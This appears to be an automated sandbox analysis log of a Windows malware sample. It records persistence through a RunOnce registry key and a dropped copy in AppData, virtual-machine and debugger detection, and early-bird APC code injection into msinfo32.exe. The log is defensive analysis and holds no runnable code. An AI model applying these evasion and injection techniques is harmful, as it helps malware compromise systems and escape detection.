Source: 11.2.msinfo32.exe.27adee40000.0.raw.unpack, 53kvWsRLWy1HlNtdTMls9U9Iz9UTCyLKs0tn5kq9Za6nq4kh3trrjLgOPGiq5C.cs	High entropy of concatenated method names: 'rLzKD21CxC8XSPSMBsRd5gefBCb75ZuFdOLyhb1o2P8WcGX6gSd2yBLHyfKLCB', 'uUBs02d3t9rmzi1gJPVE9Uip5HHNT3Zyf4wh2mfIxOxpN9sYiM9RE3eoydV6Jr', 'lF9q4oBN4qkl6fgZjpmhbP3fJnYiOyfE77VuXiqDwz7uDqH', 'PQ1XF1GodYVNj9qQ1ixxUjwTWoM5Nc23UawMC6IN320vUnh', '_8GHcQ3MY7rzKKA5VVrsP1igtRDC7cf6B251CS4hul4slV54', 'sz11TXBKX7KOhOwZgzpkwPXEEa71kCWhkEj8634ecPagGi4', 'xlAhD2SBsBk4x2L6OeWf3DcViuRRE2qNHxHOMxeYbXz9py8', 'EEjUe3mhctf021zvOVBcW7GZ4erCSVYHZSCyqt4KTyk7i03', '_8l6xB8jm62k0ewgROiR4QVXv4h6ba3pdVtNb4khSNhQTP7n', 'BKARn0FYI04TjR9YzVJ0KERtWzvspI9QhzjcD9re6a6ODC6'
Source: 11.2.msinfo32.exe.27adee40000.0.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs	High entropy of concatenated method names: '_76ue0cuKcBpfXAu8ipumvqgEKSp8NnNnoqHE3rHbHe2VLqSQlmtIs4wPoLY44UNKWfuSaqowTSysjKv', 'c47MzmvYwTPvLpqiB4KQqgeye5SDslepeZ7lr3kKlv1XrDDL9LJWg9oE2DkbMikaD08ugD2mqyq2vnn', 'EvpRQwgg6KAcyCkfeilUXpluSzRTLr6TkUiRdKrol3cpqzcKWYYm7Gaoz3wWIhop7d8DpyEB5hNDNv0', 'oQiDcpvgyH3QuS4oBw5v06rUJMfQDLGL5OimI9anQNz1BASyMWXqOh92wOpNNRE9iPC4xId70UPMG0J', '_0iyS32DUSXmCpuszhHSb669bMzLd2Jp70do47JmXB5ip2OFj8CJIHRymPHLctrCSjMEOvYBHEri4CVx', 'autHXiFJA47vTPjQs8gFiLxKYYmNqb01HeKmYtaoD7wtHhK4XKRCvbQ9NAxtEnrAOn5OSmQamUbEgqO', 'xPFsGTOs42kZAx8Dbk9vKX6ypjMK2O3GhjZexqWf7PnaVtcyN15PjFLS1gOUWhtZqrjQMMkK9pT5mdN', 'ZtDyWNs1v0G2zHttJoZnLShkqGQ9ehWMHaU5do6yYYCm1yaim9tgQBztfh34z8a6GYw8UtEu7X7GZXF', 'IajCRXKpWaSkdUI9LIxIN', 'sbTD79e9IYPCzzS6YL40G'

Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe

File created: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe

Jump to dropped file

Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce 9Q9QTPMV20RVO8c4	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce 9Q9QTPMV20RVO8c4	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce 9Q9QTPMV20RVO8c4	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce 9Q9QTPMV20RVO8c4	Jump to behavior

Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Memory allocated: 1AA12860000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Memory allocated: 1AA2AB30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Memory allocated: 204FD6F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Memory allocated: 204FD9A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Memory allocated: 27ADEE10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Memory allocated: 27AF6F20000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Window / User API: threadDelayed 6473			Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Window / User API: threadDelayed 3361			Jump to behavior

Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe

API coverage: 9.7 %

Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 2336	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 2336	Thread sleep time: -34126476536362649s >= -30000s	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 344	Thread sleep count: 6473 > 30	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 344	Thread sleep count: 3361 > 30	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 7164	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 6160	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe, 00000000.00000002.1721562376.0000025E70A51000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWT(wd
Source: SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe, 00000000.00000002.1721562376.0000025E709EB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe, 00000000.00000002.1721562376.0000025E70A51000.00000004.00000020.00020000.00000000.sdmp, FRpl.exe, 00000003.00000002.1864510706.000002806A78F000.00000004.00000020.00020000.00000000.sdmp, FRpl.exe, 00000003.00000002.1864510706.000002806A82B000.00000004.00000020.00020000.00000000.sdmp, FRpl.exe, 00000009.00000002.1943889827.00000282C5090000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: FRpl.exe, 00000009.00000002.1943889827.00000282C4FE7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx
Source: FRpl.exe, 00000003.00000002.1864510706.000002806A82B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWf7u
Source: msinfo32.exe, 00000002.00000002.4156434083.000001AA10E64000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllD

Anti Debugging

Found API chain indicative of debugger detection

Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep			graph_3-35241
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep			graph_0-35171

Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_00298820 RtlAddVectoredExceptionHandler,SetThreadDescription,	0_2_00298820
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_00291180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,exit,	0_2_00291180
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_002EA560 SetUnhandledExceptionFilter,	0_2_002EA560
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_002D2E10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,	0_2_002D2E10
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B68820 RtlAddVectoredExceptionHandler,SetThreadDescription,	3_2_00B68820
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B61180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,exit,	3_2_00B61180
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00BBA560 SetUnhandledExceptionFilter,	3_2_00BBA560
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00BA2E10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,	3_2_00BA2E10

Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Process created / APC Queued / Resumed: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Process created / APC Queued / Resumed: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Process created / APC Queued / Resumed: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Memory allocated: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe base: 1AA10C70000 protect: page read and write	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Memory allocated: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe base: 1AA11010000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Memory allocated: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe base: 204FBB00000 protect: page read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Memory allocated: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe base: 204FD660000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Memory allocated: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe base: 27ADD210000 protect: page read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Memory allocated: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe base: 27ADED60000 protect: page execute and read and write	Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe

0_2_00294AA1

Contains functionality to inject threads in other processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_00294AA1 LoadLibraryA,LoadLibraryA,CreateProcessA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,memset,InternetOpenA,InternetOpenUrlA,InternetReadFile,memset,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memset,RtlDeleteBoundaryDescriptor,VirtualAllocEx,WriteProcessMemory,QueueUserAPC,ResumeThread,SetLastError,GetModuleFileNameW,GetLastError,GetLastError,CopyFileExW,RegCreateKeyExA,RegSetValueExA,RtlRestoreThreadPreferredUILanguages,RtlDeleteBoundaryDescriptor,GetLastError,GetLastError,		0_2_00294AA1
